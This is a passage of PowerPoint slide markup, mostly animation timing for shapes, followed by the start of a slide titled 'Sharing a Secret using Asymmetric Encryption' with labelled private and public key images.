                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="801"/>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802"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="802"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="802"/>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Class="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="803"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="803"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="803"/>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1" presetID="22" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="792"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="792"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="793"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="793"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="43" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="44" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="794"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="794"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="809"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="812"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="812"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="812"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="57" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="58" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="815"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="815"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="815"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="62" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="63" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="818"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="818"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="818"/>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Class="entr" nodeType="clickEffect" presetSubtype="1" presetID="22" grpId="14" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="795"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="72" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="73" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="15" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="796"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="796"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="76" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="77" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="16" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="78" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="797"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="797"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="17" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="798"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="798"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="84" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="85" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="86" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="800">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="800">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="88" presetClass="entr" nodeType="withEffect" presetSubtype="1" presetID="22" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="89" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="800">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="800">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="91" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="92" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="19" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="93" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="790"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="790"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="95" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="96" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="800">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="800">
                                            <p:txEl>
                                              <p:pRg st="1" end="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5" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="806" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="804" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="812" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="801" grpId="4"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="800" grpId="18"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="798" grpId="17"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="818" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="790" grpId="19"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="797" grpId="16"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="809" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="802" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="794" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="793" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="792" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="796" grpId="15"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="803" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="795" grpId="14"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="815" grpId="12"/>
    </p:bldLst>
  </p:timing>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0" name="Sharing a Secret using Asymmetric Encryption"/>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Sharing a Secret using Asymmetric Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Private Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171982" y="5777653"/>
            <a:ext cx="1277903" cy="408230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="2200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Private Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="822" name="Key_Private01" descr="Key_Private01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2621279" y="6549813"/>
            <a:ext cx="756357" cy="1526259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="823" name="Key_Public01" descr="Key_Public01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
